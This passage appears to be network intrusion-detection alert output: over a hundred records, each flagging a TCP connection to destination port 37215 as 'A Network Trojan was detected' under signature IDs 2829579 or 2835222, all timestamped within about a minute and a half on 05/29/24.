                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182515
                SID:2829579
                Source Port:40956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166167
                SID:2835222
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2829579
                Source Port:50734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035251
                SID:2829579
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926353
                SID:2835222
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948115
                SID:2829579
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464102
                SID:2829579
                Source Port:51312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971995
                SID:2835222
                Source Port:33486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.227973
                SID:2835222
                Source Port:35400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811801
                SID:2835222
                Source Port:60148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983411
                SID:2835222
                Source Port:54058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043882
                SID:2835222
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228996
                SID:2829579
                Source Port:57318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652961
                SID:2835222
                Source Port:43078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072269
                SID:2829579
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701399
                SID:2829579
                Source Port:47898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584055
                SID:2829579
                Source Port:50654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587108
                SID:2835222
                Source Port:52494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615068
                SID:2829579
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163408
                SID:2829579
                Source Port:44692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654121
                SID:2835222
                Source Port:44850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.272056
                SID:2835222
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820532
                SID:2835222
                Source Port:35372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587546
                SID:2835222
                Source Port:34058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414234
                SID:2835222
                Source Port:46820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929689
                SID:2829579
                Source Port:42262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956062
                SID:2829579
                Source Port:40796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154449
                SID:2829579
                Source Port:49150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504839
                SID:2835222
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227404
                SID:2829579
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915529
                SID:2835222
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328240
                SID:2835222
                Source Port:58230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339696
                SID:2835222
                Source Port:51990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278402
                SID:2829579
                Source Port:59766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556787
                SID:2835222
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628401
                SID:2829579
                Source Port:59020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789535
                SID:2829579
                Source Port:33636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238931
                SID:2835222
                Source Port:36660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711810
                SID:2835222
                Source Port:39922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899362
                SID:2829579
                Source Port:39294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651826
                SID:2829579
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417238
                SID:2829579
                Source Port:43390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843522
                SID:2829579
                Source Port:60522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987083
                SID:2835222
                Source Port:55256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948504
                SID:2835222
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359535
                SID:2835222
                Source Port:50438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782727
                SID:2835222
                Source Port:58358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010982
                SID:2835222
                Source Port:33684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363378
                SID:2829579
                Source Port:53336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025404
                SID:2829579
                Source Port:59336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861811
                SID:2835222
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773493
                SID:2835222
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325130
                SID:2835222
                Source Port:56766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652949
                SID:2829579
                Source Port:37262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786708
                SID:2829579
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805908
                SID:2835222
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320397
                SID:2835222
                Source Port:51162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584503
                SID:2829579
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223057
                SID:2829579
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419959
                SID:2835222
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522048
                SID:2829579
                Source Port:45816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535246
                SID:2829579
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230084
                SID:2835222
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898169
                SID:2835222
                Source Port:57654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286944
                SID:2835222
                Source Port:47240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276777
                SID:2835222
                Source Port:33482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727219
                SID:2829579
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660437
                SID:2829579
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037063
                SID:2835222
                Source Port:58276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787177
                SID:2829579
                Source Port:33668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743388
                SID:2829579
                Source Port:50696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868793
                SID:2829579
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041282
                SID:2829579
                Source Port:54336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763411
                SID:2829579
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448223
                SID:2829579
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2835222
                Source Port:57496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639000
                SID:2835222
                Source Port:39634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076497
                SID:2835222
                Source Port:35104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853405
                SID:2835222
                Source Port:35676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556828
                SID:2835222
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764417
                SID:2829579
                Source Port:44780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917188
                SID:2829579
                Source Port:57570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778181
                SID:2829579
                Source Port:50008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572139
                SID:2835222
                Source Port:59846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628145
                SID:2835222
                Source Port:54508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959224
                SID:2829579
                Source Port:37022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422476
                SID:2835222
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574617
                SID:2829579
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821529
                SID:2835222
                Source Port:59588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644847
                SID:2835222
                Source Port:41944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910648
                SID:2829579
                Source Port:53212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419409
                SID:2835222
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179984
                SID:2829579
                Source Port:44326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556750
                SID:2835222
                Source Port:35122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956356
                SID:2835222
                Source Port:51040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235383
                SID:2829579
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877305
                SID:2835222
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009505
                SID:2829579
                Source Port:51652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321665
                SID:2829579
                Source Port:35684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436590
                SID:2829579
                Source Port:52680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266370
                SID:2829579
                Source Port:35950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161197
                SID:2835222
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879427
                SID:2835222
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917612
                SID:2835222
                Source Port:36614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359434
                SID:2835222
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271464
                SID:2835222
                Source Port:41970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226062
                SID:2829579
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220572
                SID:2829579
                Source Port:33254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689218
                SID:2835222
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.741744
                SID:2835222
                Source Port:59382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319645
                SID:2835222
                Source Port:59328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738405
                SID:2835222
                Source Port:55092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848892
                SID:2829579
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419604
                SID:2835222
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443083
                SID:2835222
                Source Port:36844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982610
                SID:2829579
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686274
                SID:2835222
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833671
                SID:2835222
                Source Port:55880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783695
                SID:2835222
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083667
                SID:2835222
                Source Port:39108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163721
                SID:2835222
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664421
                SID:2829579
                Source Port:47734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557186
                SID:2829579
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287775
                SID:2829579
                Source Port:32800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971463
                SID:2835222
                Source Port:59094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076174
                SID:2829579
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427610
                SID:2829579
                Source Port:52134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802342
                SID:2829579
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852199
                SID:2829579
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237675
                SID:2829579
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620765
                SID:2835222
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.671123
                SID:2835222
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973277
                SID:2835222
                Source Port:39270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452128
                SID:2835222
                Source Port:60198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170453
                SID:2829579
                Source Port:55164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560873
                SID:2835222
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733560
                SID:2829579
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537088
                SID:2829579
                Source Port:53254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555183
                SID:2835222
                Source Port:36936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533751
                SID:2829579
                Source Port:59420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712044
                SID:2829579
                Source Port:35378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734871
                SID:2835222
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665232
                SID:2835222
                Source Port:39162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215717
                SID:2829579
                Source Port:56952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181564
                SID:2829579
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607573
                SID:2829579
                Source Port:43610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930984
                SID:2835222
                Source Port:38342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264016
                SID:2829579
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473476
                SID:2829579
                Source Port:47102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785451
                SID:2829579
                Source Port:53074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668209
                SID:2829579
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717718
                SID:2835222
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176932
                SID:2829579
                Source Port:53144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025743
                SID:2835222
                Source Port:49582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735419
                SID:2829579
                Source Port:57536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784721
                SID:2835222
                Source Port:40212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850434
                SID:2835222
                Source Port:42558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025684
                SID:2829579
                Source Port:60286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558591
                SID:2835222
                Source Port:34134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571611
                SID:2835222
                Source Port:56262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783762
                SID:2829579
                Source Port:60614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336256
                SID:2829579
                Source Port:52500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256989
                SID:2835222
                Source Port:42634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818048
                SID:2835222
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210012
                SID:2829579
                Source Port:43990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175734
                SID:2835222
                Source Port:58118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225590
                SID:2835222
                Source Port:57712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265018
                SID:2835222
                Source Port:41886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841783
                SID:2829579
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649653
                SID:2835222
                Source Port:51212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136179
                SID:2829579
                Source Port:37122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434137
                SID:2835222
                Source Port:37750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264220
                SID:2829579
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626960
                SID:2829579
                Source Port:48002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097426
                SID:2829579
                Source Port:58280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669294
                SID:2835222
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261899
                SID:2829579
                Source Port:49072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421773
                SID:2829579
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969651
                SID:2829579
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732759
                SID:2829579
                Source Port:35818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445378
                SID:2829579
                Source Port:35056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907566
                SID:2829579
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733402
                SID:2835222
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509322
                SID:2829579
                Source Port:42050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163897
                SID:2835222
                Source Port:37014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507271
                SID:2829579
                Source Port:44408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184214
                SID:2829579
                Source Port:55324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335347
                SID:2835222
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.040006
                SID:2829579
                Source Port:34154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903053
                SID:2835222
                Source Port:48042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912312
                SID:2829579
                Source Port:60976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840130
                SID:2829579
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505113
                SID:2829579
                Source Port:38884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128879
                SID:2829579
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512603
                SID:2829579
                Source Port:57436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935584
                SID:2835222
                Source Port:40156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227244
                SID:2835222
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
